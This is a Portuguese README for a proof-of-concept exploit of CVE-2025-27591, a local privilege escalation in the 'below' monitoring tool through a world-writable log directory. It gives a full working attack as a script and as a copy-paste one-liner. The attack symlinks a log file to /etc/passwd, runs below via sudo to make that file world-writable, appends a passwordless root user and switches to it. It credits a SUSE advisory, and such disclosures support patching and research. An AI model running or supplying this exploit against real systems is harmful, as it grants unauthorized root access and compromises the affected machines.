
Below v0.8.1 - Escalação de Privilégio Local (CVE-2025-27591) - Exploração PoC
Below <= v0.8.1
Escalação Local de Privilégios via Link Simbólico de Log com Permissão de Escrita Global
PoC Exploit
As versões do Below <= 0.8.1 contêm uma vulnerabilidade crítica de escalação local de privilégios (CVE-2025-27591).
Devido a um diretório de logs mal configurado com permissão de escrita global (/var/log/below/) e uma lógica de permissões insegura no código Rust, um atacante local pode criar um link simbólico error_<usuário>.log para qualquer arquivo de propriedade do root, como /etc/passwd.
Quando below snapshot é executado com sudo, ele força a definição do modo 0666 no arquivo de log e grava nele—mesmo que seja um link simbólico.
Isso permite a injeção de um usuário com privilégios root sem senha, levando ao acesso completo a um shell root.
git clone https://github.com/rvizx/CVE-2025-27591
cd CVE-2025-27591
chmod +x exploit.sh
./exploit.sh
OU
Código do Exploit
# Título : Below v0.8.1 - Escalação Local de Privilégios (CVE-2025-27591) - PoC Exploit
# Autor : Ravindu Wickramasinghe (aka rvz)
# Uso : usage: ./exploit.sh
u=$(id -un)
rm -f /var/log/below/error_"$u".log
ln -s /etc/passwd /var/log/below/error_"$u".log # link simbólico do arquivo de log para /etc/passwd
export LOGS_DIRECTORY=/var/log/below
sudo /usr/bin/below snapshot --begin now 2>/dev/null || true # below altera as permissões do alvo do link para 0666 e escreve nele
echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd # anexa entrada de usuário pwn (privilégios root) ao /etc/passwd (agora gravável)
su pwn
Nota: Adicionei exploit.sh ao README.md depois que o IppSec usou o one-liner em vez do exploit.sh em seu walkthrough. Achei que isso seria mais fácil para todos. Obrigado, IppSec. ^^
OU
One-liner - (Copie, cole e execute)
u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
sudo com acesso NOPASSWD a /usr/bin/below *Descoberto e reportado por Matthias Gerstner @ SUSE - Advisory de Segurança
PoC Exploit - Ravindu Wickramasinhge AKA rvz